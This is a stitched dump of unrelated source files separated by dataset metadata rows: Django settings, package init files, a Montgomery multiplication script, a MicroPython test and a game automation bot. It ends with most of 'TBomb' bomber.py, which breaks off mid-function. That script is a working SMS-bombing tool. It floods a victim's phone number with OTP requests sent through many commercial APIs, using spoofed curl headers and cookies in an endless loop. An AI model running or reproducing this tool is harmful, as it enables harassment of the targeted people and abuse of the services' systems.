# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| 25.495868
| 91
| 0.696921
|
4a18edcdf17b0c16da89722622f70505a7b3b92c
| 860
|
py
|
Python
|
climateeconomics/tests/witness_constraints_wrt_design_var_jacobian_pickle_dump.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2022-01-14T06:37:42.000Z
|
2022-01-14T06:37:42.000Z
|
climateeconomics/tests/witness_constraints_wrt_design_var_jacobian_pickle_dump.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
climateeconomics/tests/witness_constraints_wrt_design_var_jacobian_pickle_dump.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import climateeconomics.tests as jacobian_target
from sos_trades_core.tests.core.abstract_jacobian_unit_test import AbstractJacobianUnittest
if __name__ == '__main__':
AbstractJacobianUnittest.launch_all_pickle_generation(
jacobian_target, '_l2_test_constraints_gradient_witness.py')
| 33.076923
| 91
| 0.803488
|
4a18ef2cf7f8eaefacf3da5c0134dbfa5d270674
| 201
|
py
|
Python
|
util/__init__.py
|
ywchiao/shot
|
4b7c55bdcca44d05e07fffa59fe4e23364032cb5
|
[
"MIT"
] | null | null | null |
util/__init__.py
|
ywchiao/shot
|
4b7c55bdcca44d05e07fffa59fe4e23364032cb5
|
[
"MIT"
] | null | null | null |
util/__init__.py
|
ywchiao/shot
|
4b7c55bdcca44d05e07fffa59fe4e23364032cb5
|
[
"MIT"
] | 1
|
2020-03-27T02:07:27.000Z
|
2020-03-27T02:07:27.000Z
|
from .angle import Angle
from .circular_list import CircularList
from .node import Node
from .table import Table
from .vector_2d import Vector2D
from .module_loader import load_module
# __init__.py
| 18.272727
| 39
| 0.81592
|
4a18ef9334205d3f28adf97e9cd9203575408a26
| 1,112
|
py
|
Python
|
scripts/monty.py
|
TobiasFFThomsen/EncryptionAccelerator
|
bc9dd86cc83956530e5c2a9abc1cdb2501b346eb
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
scripts/monty.py
|
TobiasFFThomsen/EncryptionAccelerator
|
bc9dd86cc83956530e5c2a9abc1cdb2501b346eb
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
scripts/monty.py
|
TobiasFFThomsen/EncryptionAccelerator
|
bc9dd86cc83956530e5c2a9abc1cdb2501b346eb
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
# 17^2 mod 33 on montgomery form
a = 17
b = 18
c = 19
n = 37
# We compute c = a*b mod n by converting to montgomery form. We choose R > n
R = 64
R_inverse = 11
result_expected_1 = a * b % n
print("a*b mod n: ", result_expected_1)
# For 3 case multiplications we get
# c = a*b*c mod n
result_expected_2 = a * b * c % n
print("a*b*c mod n: ", result_expected_2)
# Now with the Montgomery form and Redc algorithm
# Compute residues
a_resid = a*R % n
b_resid = b*R % n
c_resid = c*R % n
print("a-residual: ", a_resid)
print("b-residual: ", b_resid)
print("c-residual: ", c_resid)
naive_expected = ((a_resid % n) * (b_resid % n) * R_inverse) % n * 11 % n
print("a*b mod n (Montgomery): ", naive_expected)
print()
k = (64*11 - 1) / n
print("k: ", k)
print("Redc algorithm:")
print("Redc(T) computes TR^-1 mod n")
def Redc(T, R, k, n):
# Given inputs:
# T = a_bar * b_bar Redc
# n
# Redc(T, n) outputs c_bar
m = (T % R)*k % R
t = (T + m*n)/R
if t >= n:
return t - n
else:
return t
print(Redc(Redc(a_resid*b_resid, R, k, n) * c_resid, R, k, n) * R_inverse % n)
| 22.693878
| 78
| 0.598022
|
4a18efa592a6ac74575e3ffc5090f84c206fd5a9
| 891
|
py
|
Python
|
env/Lib/site-packages/plotly/graph_objs/barpolar/__init__.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
venv/Lib/site-packages/plotly/graph_objs/barpolar/__init__.py
|
wakisalvador/constructed-misdirection
|
74779e9ec640a11bc08d5d1967c85ac4fa44ea5e
|
[
"Unlicense"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
venv/Lib/site-packages/plotly/graph_objs/barpolar/__init__.py
|
wakisalvador/constructed-misdirection
|
74779e9ec640a11bc08d5d1967c85ac4fa44ea5e
|
[
"Unlicense"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
import sys
if sys.version_info < (3, 7):
from ._hoverlabel import Hoverlabel
from ._legendgrouptitle import Legendgrouptitle
from ._marker import Marker
from ._selected import Selected
from ._stream import Stream
from ._unselected import Unselected
from . import hoverlabel
from . import legendgrouptitle
from . import marker
from . import selected
from . import unselected
else:
from _plotly_utils.importers import relative_import
__all__, __getattr__, __dir__ = relative_import(
__name__,
[".hoverlabel", ".legendgrouptitle", ".marker", ".selected", ".unselected"],
[
"._hoverlabel.Hoverlabel",
"._legendgrouptitle.Legendgrouptitle",
"._marker.Marker",
"._selected.Selected",
"._stream.Stream",
"._unselected.Unselected",
],
)
| 29.7
| 84
| 0.643098
|
4a18efbca2e37155ae687a931b6d1c0126ebf7df
| 345
|
py
|
Python
|
attack/crafter/__init__.py
|
nps1ngh/adversarial-bert-german-attacks-defense
|
3cca292ec4c3c07945f4198ae81e1f671462ed90
|
[
"Apache-2.0"
] | 2
|
2022-03-05T15:05:14.000Z
|
2022-03-06T11:19:47.000Z
|
attack/crafter/__init__.py
|
nps1ngh/adversarial-bert-german-attacks-defense
|
3cca292ec4c3c07945f4198ae81e1f671462ed90
|
[
"Apache-2.0"
] | null | null | null |
attack/crafter/__init__.py
|
nps1ngh/adversarial-bert-german-attacks-defense
|
3cca292ec4c3c07945f4198ae81e1f671462ed90
|
[
"Apache-2.0"
] | 1
|
2022-01-12T20:30:54.000Z
|
2022-01-12T20:30:54.000Z
|
from crafter.blackbox.character_level import BlackboxCharacterLevel
from crafter.blackbox.word_level import BlackboxWordLevelAttack
from crafter.whitebox.word_level import WhiteboxWordLevelAttack
from crafter.whitebox.character_level import WhiteboxCharacterLevel
from crafter.whitebox.baseline_word_level import BaselineWhiteboxWordLevelAttack
| 57.5
| 80
| 0.913043
|
4a18f034b96fbe3fd7943f2ba434326f65edefd8
| 564
|
py
|
Python
|
samples/mxm_openmp.py
|
dina-fouad/pyccel
|
f4d919e673b400442b9c7b81212b6fbef749c7b7
|
[
"MIT"
] | 206
|
2018-06-28T00:28:47.000Z
|
2022-03-29T05:17:03.000Z
|
samples/mxm_openmp.py
|
dina-fouad/pyccel
|
f4d919e673b400442b9c7b81212b6fbef749c7b7
|
[
"MIT"
] | 670
|
2018-07-23T11:02:24.000Z
|
2022-03-30T07:28:05.000Z
|
samples/mxm_openmp.py
|
dina-fouad/pyccel
|
f4d919e673b400442b9c7b81212b6fbef749c7b7
|
[
"MIT"
] | 19
|
2019-09-19T06:01:00.000Z
|
2022-03-29T05:17:06.000Z
|
# coding: utf-8
from numpy import zeros
n = 800
m = 1600
p = 800
a = zeros((n,m))
b = zeros((m,p))
c = zeros((n,p))
#$ omp parallel
#$ omp for schedule(runtime)
for i in range(0, n):
for j in range(0, m):
a[i,j] = i-j
#$ omp end for nowait
#$ omp for schedule(runtime)
for i in range(0, m):
for j in range(0, p):
b[i,j] = i+j
#$ omp end for nowait
#$ omp for schedule(runtime)
for i in range(0, n):
for j in range(0, p):
for k in range(0, p):
c[i,j] = c[i,j] + a[i,k]*b[k,j]
#$ omp end for
#$ omp end parallel
| 17.090909
| 43
| 0.544326
|
4a18f2c73ce72d1f7d537a2c348a02f0f9538fc9
| 4,152
|
py
|
Python
|
arknights/load_scenes.py
|
yue-litam/arknights-auto-scripts
|
4670b7a0c3e0b6b4c0e269ef13cf3d75c0b06a24
|
[
"Apache-2.0"
] | 24
|
2019-12-01T18:18:06.000Z
|
2021-09-25T06:47:02.000Z
|
arknights/load_scenes.py
|
yue-litam/arknights-auto-scripts
|
4670b7a0c3e0b6b4c0e269ef13cf3d75c0b06a24
|
[
"Apache-2.0"
] | 5
|
2020-05-22T12:09:59.000Z
|
2022-01-13T01:51:27.000Z
|
arknights/load_scenes.py
|
yue-litam/arknights-auto-scripts
|
4670b7a0c3e0b6b4c0e269ef13cf3d75c0b06a24
|
[
"Apache-2.0"
] | 6
|
2020-06-19T06:35:13.000Z
|
2021-11-29T06:04:06.000Z
|
import time
from common.logutil import logger
from common.scene import Scene
from common.tool import load_resource
def account_upgrade_detection(prefix):
return Scene('检测账号升级',
identify_image=load_resource('account_upgrade_detection.png', prefix))
def prts_disable_detection(prefix):
return Scene('检测自律未打开', identify_image=load_resource('prts_disable_detection.png', prefix))
def level_info_detection(prefix):
image = load_resource('level_info_detection.png', prefix)
width, _ = image.shape[::-1]
return Scene('检测指定关卡信息介绍页面', identify_image=image, tap_offset_x=width)
def annihilation_detection(prefix):
image = load_resource('annihilation_detection.png', prefix)
width, _ = image.shape[::-1]
return Scene('检测剿灭模式关卡信息介绍页面',
identify_image=load_resource('annihilation_detection.png', prefix),
tap_offset_x=250,
tap_offset_y=30)
def annihilation_finish_detection(prefix):
return Scene('检测剿灭模式自律完成页面', identify_image=load_resource('annihilation_finish_detection.png', prefix))
def prts_running_scene(prefix):
s = Scene('检测自律战斗进行中', action_type='none',
identify_image=load_resource('level_fighting_detection.png', prefix))
return s
def level_team_detection(config, context, prefix):
def before_action(_1, _2):
if 0 <= config.repeat_count_max <= context.repeated_count:
logger.info('\n\n预设的复读次数已完成')
exit(0)
context.repeated_count += 1
logger.info('第 %03d 次副本' % context.repeated_count)
s = Scene('检测指定关卡自律队伍阵容页面',
identify_image=load_resource('level_team_detection.png', prefix))
s.before_action = before_action
s.after_action = lambda _1, _2: time.sleep(2)
return s
def level_finish_detection(context, prefix):
def after_action(_1, _2):
context.flag_start_printed = False
s = Scene('检测指定关卡自律完成页面',
identify_image=load_resource('level_finish_detection.png', prefix))
s.after_action = after_action
return s
def exchange_intellect_by_pharmacy(config, context, prefix):
def before_action(_1, _2):
if config.use_pharmacy_max > 0:
if context.pharmacy_used >= config.use_pharmacy_max:
logger.info('已到达预设的可用药剂上限, 脚本将退出')
exit(0)
else:
context.pharmacy_used += 1
else:
logger.info('理智不足,自动退出脚本')
exit(0)
s = Scene('检测建议使用药剂补充理智页面',
identify_image=load_resource('exchange_intellect_by_pharmacy.png', prefix),
tap_image=load_resource("exchange_intellect_confirm.png", prefix))
s.before_action = before_action
return s
def exchange_intellect_by_stone(config, context, prefix):
def before_action(_1, _2):
if config.use_stone_max > 0:
if context.stone_used >= config.use_stone_max:
logger.info('已到达预设的可用源石上限, 脚本将退出')
exit(0)
else:
context.stone_used += 1
else:
logger.info('理智不足,自动退出脚本')
exit(0)
s = Scene('检测建议使用石头补充理智页面',
identify_image=load_resource('exchange_intellect_by_stone.png', prefix),
tap_image=load_resource("exchange_intellect_confirm.png", prefix))
s.before_action = before_action
return s
def load_scenes(prefix, config, context):
return [
prts_disable_detection(prefix), # 战斗关卡确认出击
account_upgrade_detection(prefix), # 战斗结束后账号等级提升
annihilation_detection(prefix), # 剿灭确认出击
annihilation_finish_detection(prefix), # 剿灭完成
level_info_detection(prefix), # 战斗关卡确认出击
level_team_detection(config, context, prefix), # 战斗前队伍预览
level_finish_detection(context, prefix), # 战斗结束后账号等级提升
prts_running_scene(prefix), # 副本还在进行中
exchange_intellect_by_pharmacy(config, context, prefix), # 理智不足时有可使用的药剂
exchange_intellect_by_stone(config, context, prefix), # 理智不足时有可使用的石头
]
| 35.186441
| 108
| 0.654383
|
4a18f2f8d81d27afb31d8a46f5d4fccf5ea6b00c
| 51
|
py
|
Python
|
src/brainy/version.py
|
pelkmanslab/brainy
|
eb088be9585734c66be5d6ef0b7127a923f4066c
|
[
"MIT"
] | null | null | null |
src/brainy/version.py
|
pelkmanslab/brainy
|
eb088be9585734c66be5d6ef0b7127a923f4066c
|
[
"MIT"
] | null | null | null |
src/brainy/version.py
|
pelkmanslab/brainy
|
eb088be9585734c66be5d6ef0b7127a923f4066c
|
[
"MIT"
] | null | null | null |
__version__ = '0.2.1'
brainy_version = __version__
| 17
| 28
| 0.764706
|
4a18f414dde63eff7e1a06931ef3b1725eecda3f
| 539
|
py
|
Python
|
tests/import/module_getattr.py
|
sebi5361/micropython
|
6c054cd124bc6229bee127128264dc0829dea53c
|
[
"MIT"
] | 198
|
2017-03-24T23:23:54.000Z
|
2022-01-07T07:14:00.000Z
|
tests/import/module_getattr.py
|
sebi5361/micropython
|
6c054cd124bc6229bee127128264dc0829dea53c
|
[
"MIT"
] | 509
|
2017-03-28T19:37:18.000Z
|
2022-03-31T20:31:43.000Z
|
tests/import/module_getattr.py
|
sebi5361/micropython
|
6c054cd124bc6229bee127128264dc0829dea53c
|
[
"MIT"
] | 187
|
2017-03-24T23:23:58.000Z
|
2022-02-25T01:48:45.000Z
|
# test __getattr__ on module
# ensure that does_not_exist doesn't exist to start with
this = __import__(__name__)
try:
this.does_not_exist
assert False
except AttributeError:
pass
# define __getattr__
def __getattr__(attr):
if attr == 'does_not_exist':
return False
raise AttributeError
# do feature test (will also test functionality if the feature exists)
if not hasattr(this, 'does_not_exist'):
print('SKIP')
raise SystemExit
# check that __getattr__ works as expected
print(this.does_not_exist)
| 22.458333
| 70
| 0.742115
|
4a18f493f277e47762b80bc38916a51ed63e45bd
| 36,723
|
py
|
Python
|
bomber.py
|
byanonyms/TBomb
|
649af75e6e41b6f8949ecac7a0ba6761be26acf3
|
[
"MIT"
] | 1
|
2020-04-21T09:24:41.000Z
|
2020-04-21T09:24:41.000Z
|
bomber.py
|
byanonyms/TBomb
|
649af75e6e41b6f8949ecac7a0ba6761be26acf3
|
[
"MIT"
] | null | null | null |
bomber.py
|
byanonyms/TBomb
|
649af75e6e41b6f8949ecac7a0ba6761be26acf3
|
[
"MIT"
] | 1
|
2020-10-11T08:55:32.000Z
|
2020-10-11T08:55:32.000Z
|
#!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To SpeedX And All Other Contributors Listed At https://github.com/TheSpeedX/TBomb
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
████████ ██████ ██
▒▒▒██▒▒▒ ██▒▒▒██ ██
██ ██ ██ ████ ██ ██ ██
██ ██████▒ ██▒▒██ ███ ███ █████
██ ██▒▒▒██ ██ ██ ██▒█▒██ ██▒▒██
██ ██ ██ ██ ██ ██ ▒ ██ ██ ██
██ ██████▒ ▒████▒ ██ ██ █████▒
▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒▒▒▒
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, max):
global count_inf
while True:
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo SpeedX >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
res = False
try:
requests.get('https://www.google.com', verify=True)
res = False
except Exception:
res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tTBomb Will Stop Now...\n\n')
banner()
exit()
def getapi(pn, lim, cc):
global country_codes
cc = str(cc).strip()
cnn = country_codes[cc]
lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
os.system('curl -s -X POST -H "Host:m.netmeds.com" -H "content-length:76" -H "accept:*/*" -H "origin:https://m.netmeds.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://m.netmeds.com/customer/account/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:checkmobileno-popup=quWqfunF" -H "cookie:section_data_ids=%7B%22cart%22%3A1559721914%2C%22directory-data%22%3A1559721853%7D" -H "cookie:mage-messages=" -H "cookie:_gat_UA-63910444-1=1" -H "cookie:_gac_UA-63910444-1=1.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_gcl_aw=GCL.1559721866.CjwKCAjw0N3nBRBvEiwAHMwvNuYvgGcnYSdAie5_0MBknXSXxfrtAQ-otjvqdbr_MPyAf56mFqwQTxoChEUQAvD_BwE" -H "cookie:_nmstracking=| sms | ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsUTMtrackingsource=ADW-CPC-Search-NMS-Brand-OC&ADW-CPC-Search-NMS-Brand-OC&CPC&ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsCampaign=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsMedium=CPC" -H "cookie:_nmsSource=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:_nmsAttr=ADW-CPC-Search-NMS-Brand-OC" -H "cookie:private_content_version=eef016e2f8225f631d4a6e1cf8cdf4ac" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:form_key=YGWpwHiCN5uglOtY" -H "cookie:_gid=GA1.3.93227781.1559647218" -H "cookie:mage-translation-file-version=%7B%7D" -H "cookie:mage-translation-storage=%7B%7D" -H "cookie:_gcl_au=1.1.656472353.1559647214" -H "cookie:PHPSESSID=b5i36rg02l2jg9cielmm9fl7c6" -H "cookie:cto_lwid=e5917844-4f1b-48f9-bf74-b0bfdd5c79ce" -H "cookie:bsCoId=3558720339100" -H "cookie:bsUl=0" -H "cookie:_fbp=fb.1.1558720332185.799068042" -H "cookie:_ga=GA1.3.185497001.1558720330" -d \'register_mobileno=' + pn + '&logintype=Otp&uniq_identy=quWqfunF&forget_pwd=N\' "https://m.netmeds.com/sociallogin/popup/nmsgetcode/" > /dev/null 2>&1')
return True
elif lim == 4:
os.system(
'curl -s -X POST -H "Host:client-api.goomo.com" -H "origin:https://www.goomo.com" -H "client:m-web" -H "x-goomo-platform:mWeb" -H "dnt:1" -H "content-type:application/json" -H "accept:*/*" -H "referer:https://www.goomo.com/hotels" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -d \'{"email":"fakeemail@gmail.com","phone_number":"' + pn + '","country_code":"' + cc + '"}\' "https://client-api.goomo.com/v2/phone_confirmation/verify_user" > /dev/null 2>&1')
return True
elif lim == 5:
os.system('curl -s -X POST -H "Accept:*/*" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-US,en;q=0.5" -H "Connection:keep-alive" -H "Content-Length:34" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:www.oriyamatrimony.com" -H "Referer:https://www.oriyamatrimony.com/" -H "User-Agent:Mozilla/5.0 (Windows NT 8.1; Win64; x64; rv:59.0) Gecko/20 Firefox/56.0" -H "X-Requested-With:XMLHttpRequest" -d "countrycode=' +
cc + '&mobileno=' + pn + '" "https://www.oriyamatrimony.com/login/mobileappsms-homepage.php" > /dev/null 2>&1')
return True
elif lim == 6:
os.system(
'curl -s -X POST -H "host:www.flipkart.com" -H "user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" -H "accept:*/*" -H "accept-language:en-US,en;q=0.5" -H "accept-encoding:gzip, deflate, br" -H "referer:https://www.flipkart.com/" -H "x-user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 FKUA/website/41/website/Desktop" -H "origin:https://www.flipkart.com" -H "connection:keep-alive" -H "Content-Type:application/json; charset=utf-8" -H "Content-Length:53" -d \'{"loginId":["+' + cc + pn + '"],"supportAllStates":true}\' "https://www.flipkart.com/api/6/user/signup/status" > /dev/null 2>&1')
return True
elif lim == 7:
os.system('curl -s -X POST -H "Host:www.flipkart.com" -H "Connection:keep-alive" -H "Content-Length:60" -H "X-user-agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 FKUA/website/41/website/Desktop" -H "Origin:https://www.flipkart.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded" -H "Accept:*/*" -H "Referer:https://www.flipkart.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:T=BR%3Acjvqzhglu1mzt95aydzhvwzq1.1558031092050; SWAB=build-44be9e47461a74d737914207bcbafc30; lux_uid=155867904381892986; AMCVS_17EB401053DAF4840A490D4C%40AdobeOrg=1; AMCV_17EB401053DAF4840A490D4C%40AdobeOrg=-227196251%7CMCIDTS%7C18041%7CMCMID%7C63273353035509304576927719203948933246%7CMCAID%7CNONE%7CMCOPTOUT-1558686245s%7CNONE%7CMCAAMLH-1559283845%7C12%7CMCAAMB-1559283845%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI; s_cc=true; SN=2.VI8085A6A237EB4C62836C8809F0D312EB.SI21A9EC4E99B949B2ACE6361B3F0208CC.VS187649B2B06A44C69824006710CB6D83.1558679078; gpv_pn=HomePage; gpv_pn_t=Homepage; S=d1t17GQVqPz9KPzobP3M4GQkjPy34TjfJxI4SbXVIvhwzm3mE13vfSEulmf90D/7L710qUpMq8mA0k2bx6b2DuwIS4g==; s_sq=%5B%5BB%5D%5D" -d \'loginId=+' + cc + pn + '&state=VERIFIED&churnEmailRequest=false\' "https://www.flipkart.com/api/5/user/otp/generate" > /dev/null 2>&1')
return True
elif lim == 8:
os.system('curl -s -X POST -H "Host:www.ref-r.com" -H "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Accept-Language:en-US,en;q=0.5" -H "Accept-Encoding:gzip, deflate, br" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With:XMLHttpRequest" -H "Content-Length:26" -H "DNT:1" -H "Connection:keep-alive" -d "mobile=' + pn + '&submit=1&undefined=" "https://www.ref-r.com/clients/lenskart/smsApi" > /dev/null 2>&1')
return True
elif lim == 9:
rd = os.popen('curl -s -X POST -H "X-DROID-VERSION:4.12.5" -H "API-Version:2.0" -H "user-agent:samsung SM-G9350 0 4.4.2" -H "client-version:Android-4.12.5" -H "X-DROID-VERSION-CODE:158" -H "Accept:application/json" -H "client-name:Practo Android App" -H "Content-Type:application/x-www-form-urlencoded" -H "Host:accounts.practo.com" -H "Connection:Keep-Alive" -H "Content-Length:96" -d "client_name=Practo+Android+App&fingerprint=&mobile=%2B' + cc + pn + '&device_name=samsung+SM-G9350&" "https://accounts.practo.com/send_otp"').read()
return rd.find("success") != -1
elif lim == 10:
os.system(
